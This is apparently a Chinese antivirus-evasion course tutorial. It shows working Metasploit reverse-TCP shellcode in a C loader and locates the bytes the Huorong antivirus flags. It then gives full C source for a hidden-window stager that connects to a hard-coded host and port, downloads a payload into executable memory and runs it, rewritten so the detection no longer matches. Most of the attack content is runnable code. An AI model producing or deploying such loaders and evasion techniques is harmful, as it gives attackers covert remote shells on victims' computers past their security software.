文章来源|MS08067 免杀实战培训班
本文作者:小玉玉(免杀班讲师)
我们今天从一个比较特别的方式去思考免杀,就是从杀毒软件的病毒库去思考怎么去做免杀。
免杀载体:msfpayload,用的汇编直接加载
免杀目标:火绒
1.免杀载体介绍
是一个简单的内联汇编加载shellcode的payload,为什么用这个呢,因为这个我们之后反汇编起来比较简单。
代码如下:
代码语言:javascript复制// ConsoleApplication1.cpp : 定义控制台应用程序的入口点。
//
#include "stdafx.h"
#pragma comment(linker, "/section:.data,RWE")//对于内存的保护属性 可读可写可执行
#pragma comment( linker, "/subsystem:"windows" /entry:"mainCRTStartup"")
unsigned char buf[] =
"xfcxe8x8fx00x00x00x60x89xe5x31xd2x64x8bx52x30"
"x8bx52x0cx8bx52x14x31xffx8bx72x28x0fxb7x4ax26"
"x31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7x49"
"x75xefx52x57x8bx52x10x8bx42x3cx01xd0x8bx40x78"
"x85xc0x74x4cx01xd0x8bx48x18x50x8bx58x20x01xd3"
"x85xc9x74x3cx49x8bx34x8bx01xd6x31xffx31xc0xc1"
"xcfx0dxacx01xc7x38xe0x75xf4x03x7dxf8x3bx7dx24"
"x75xe0x58x8bx58x24x01xd3x66x8bx0cx4bx8bx58x1c"
"x01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59"
"x5ax51xffxe0x58x5fx5ax8bx12xe9x80xffxffxffx5d"
"x68x33x32x00x00x68x77x73x32x5fx54x68x4cx77x26"
"x07x89xe8xffxd0xb8x90x01x00x00x29xc4x54x50x68"
"x29x80x6bx00xffxd5x6ax0ax68xc0xa8x02xd5x68x02"
"x00x11x5cx89xe6x50x50x50x50x40x50x40x50x68xea"
"x0fxdfxe0xffxd5x97x6ax10x56x57x68x99xa5x74x61"
"xffxd5x85xc0x74x0axffx4ex08x75xecxe8x67x00x00"
"x00x6ax00x6ax04x56x57x68x02xd9xc8x5fxffxd5x83"
"xf8x00x7ex36x8bx36x6ax40x68x00x10x00x00x56x6a"
"x00x68x58xa4x53xe5xffxd5x93x53x6ax00x56x53x57"
"x68x02xd9xc8x5fxffxd5x83xf8x00x7dx28x58x68x00"
"x40x00x00x6ax00x50x68x0bx2fx0fx30xffxd5x57x68"
"x75x6ex4dx61xffxd5x5ex5exffx0cx24x0fx85x70xff"
"xffxffxe9x9bxffxffxffx01xc3x29xc6x75xc1xc3xbb"
"xf0xb5xa2x56x6ax00x53xffxd5";
void main()
{
__asm
{
/*
mov eax, offset buf
*/
lea eax, buf;
call eax;
}
}
2.找到火绒的识别依据
我们这里使用myccl做为我们的工具。
MYCCL下载|特征码定位器MYCCL(http://www.rsdown.cn/down/32780.html)
首先我们先看看各个区段:
代码语言:javascript复制程序启动正常!
发现历史记录信息,已经成功导入!
------------------------------------------------
PE文件 节表信息
文件名:F:bC 学习汇编花指令加载shellcodeReleaseConsoleApplication1.exe
------------------------------------------------
.text 00000400 0000B200
.bss 00000000 00000000
.rdata 0000B600 00005C00
.data 00011200 00000A00
.rsrc 00011C00 00000200
.reloc 00011E00 00000E00
接下来我们把我们的payload分成1000份给火绒杀毒,二次处理之后的结果如下:
代码语言:javascript复制执行二次处理中....
[注意] 文件00011B34_0000004C出现特征码!
执行二次处理中....
(*)没有发现新的特征码....
------------------------------------------------
>>复合特征码定位结果<<
文件名:F:bC 学习汇编花指令加载shellcodeReleaseConsoleApplication1.exe
------------------------------------------------
特征码 物理地址/物理长度 如下:
[特征] 00011B34_0000004C
特征码分布示意图:
[--------------------------------------------------]
[--------------------------------------------------]
[--------------------------------------------------]
[--------------------------------------------------]
[------------------------------------M-------------]
大家可以注意到00011B34是在00011200和00011C00之间的,也就是data字段,那么这个字段就是我们的变量存放的地方,然后回去看看我们的源代码,我们的源代码是只有shellcode作为我们的变量的,这个时候我们就分析出来,火绒是通过识别shellcode来做查杀的,那么问题来了,火绒具体是查杀的shellcode中的什么内容作为我们的依据的呢?
3.分析具体内容
我们用二进制编辑器打开我们的payload并找到00011B34:
我们计算一下00011B34 0000004C=11b80,也就是说从11b34开始一直到11b80都是我们需要查看的部分。
1.png
现在二进制代码找到了,我们来看看汇编层面下是什么样子的,打开od,翻到text段第二行代码
代码语言:javascript复制call eax
f7跟进去就是我们的shellcode的内容,然后找到一个比较好找的二进制序列,我这里用的是开头的“29、80、6b”。
2.png
那么也就是说从这里开始一直往下到“83、f8”都是火绒识别的内容,那么这段代码的详细意思是什么呢?
我们现在找到msf的源代码:
metasploit-framework/block_reverse_tcp.asm at master · rapid7/metasploit-framework (github.com)
代码语言:javascript复制reverse_tcp:
push 0x00003233 ; Push the bytes 'ws2_32',0,0 onto the stack.
push 0x5F327377 ; ...
push esp ; Push a pointer to the "ws2_32" string on the stack.
push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" )
call ebp ; LoadLibraryA( "ws2_32" )
mov eax, 0x0190 ; EAX = sizeof( struct WSAData )
sub esp, eax ; alloc some space for the WSAData structure
push esp ; push a pointer to this stuct
push eax ; push the wVersionRequested parameter
push 0x006B8029 ; hash( "ws2_32.dll", "WSAStartup" )
call ebp ; WSAStartup( 0x0190, &WSAData );
push eax ; if we succeed, eax wil be zero, push zero for the flags param.
push eax ; push null for reserved parameter
push eax ; we do not specify a WSAPROTOCOL_INFO structure
push eax ; we do not specify a protocol
inc eax ;
push eax ; push SOCK_STREAM
inc eax ;
push eax ; push AF_INET
push 0xE0DF0FEA ; hash( "ws2_32.dll", "WSASocketA" )
call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
xchg edi, eax ; save the socket for later, don't care about the value of eax after this
set_address:
push byte 0x05 ; retry counter
push 0x0100007F ; host 127.0.0.1
push 0x5C110002 ; family AF_INET and port 4444
mov esi, esp ; save pointer to sockaddr struct
try_connect:
push byte 16 ; length of the sockaddr struct
push esi ; pointer to the sockaddr struct
push edi ; the socket
push 0x6174A599 ; hash( "ws2_32.dll", "connect" )
call ebp ; connect( s, &sockaddr, 16 );
test eax,eax ; non-zero means a failure
jz short connected
handle_failure:
dec dword [esi 8]
jnz short try_connect
failure:
push 0x56A2B5F0 ; hardcoded to exitprocess for size
call ebp
connected:
现在请大家找到这一行:
代码语言:javascript复制 push 0x006B8029 ; hash( "ws2_32.dll", "WSAStartup" )
我们的火绒就是从这里开始识别的(注意看刚才od里的截图)。
msf的注释写的非常详细,这一大段代码其实就是建立wsa对象并且使用这个对象进行tcp链接。
4.免杀的思考
那么既然这里是用的tcp的链接,我们又该如何去思考怎么做免杀呢?
非常简单,替换方式,具体是什么方式呢?大家注意到没有,由于shellcode是要支持直接在内存中运行的代码,所以上面的代码中调用函数的过程全部都是通过hash的方式去调用的函数,那么除了hash调用的方法之外还有没有其他的呢?
这里我仅提供一个思路,我们是不是可以使用最传统的方式,也就是自己写一个完整的pe结构然后导入表里面带上我们所需要的函数不就可以了嘛。
具体代码如下:
代码语言:javascript复制#include <WinSock2.h>
#include <stdio.h>
#pragma warning (disable: 4996)
#pragma comment(lib,"WS2_32.lib")
#include<windows.h>
int main(int argc, char** argv)
{
ShowWindow(GetForegroundWindow(), 0);
WSADATA wsData;
if (WSAStartup(MAKEWORD(2, 2), &wsData))
{
printf("WSAStartp fail.n");
return 0;
}
SOCKET sock = WSASocket(AF_INET, SOCK_STREAM, 0, 0, 0, 0);
SOCKADDR_IN server;
ZeroMemory(&server, sizeof(SOCKADDR_IN));
server.sin_family = AF_INET;
server.sin_addr.s_addr = inet_addr("192.168.2.213"); //server ip
server.sin_port = htons(4444); //server port
if (SOCKET_ERROR == connect(sock, (SOCKADDR*)&server, sizeof(server)))
{
printf("connect to server fail.n");
goto Fail;
}
u_int payloadLen;
if (recv(sock, (char*)&payloadLen, sizeof(payloadLen), 0) != sizeof(payloadLen))
{
printf("recv errorn");
goto Fail;
}
char* orig_buffer;
orig_buffer = (char*)VirtualAlloc(NULL, payloadLen, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
char* buffer;
buffer = orig_buffer;
int ret;
ret = 0;
do
{
ret = recv(sock, buffer, payloadLen, 0);
buffer = ret;
payloadLen -= ret;
} while (ret > 0 && payloadLen > 0);
__asm
{
mov edi, sock;
jmp orig_buffer;
}
VirtualFree(orig_buffer, 0, MEM_RELEASE);
Fail:
closesocket(sock);
WSACleanup();
return 0;
}
上面的代码大家可以发现,我们整个wsa对象的创建、使用都是使用C 编写的,这样在我们编译的过程中我们所需要的函数就都在导入表里面了,整个代码相当于我们重新用C 写了一下火绒识别的地方,这样就没有什么“push 0x006B8029”这种立即数了而是直接call对应的函数就行,自然而然地,我们的二进制代码火绒也就识别不出来了。
3.png
5. 总结
思路很重要,大家学习免杀的时候不要光学代码去了,一定要思考为什么能免杀,为什么不能免杀,多从杀毒软件的角度去思考很重要。
给大家一个思考题吧:除了hash和传统的导入表能用函数之外还有哪些方式呢?能不能尝试自己写一个呢?
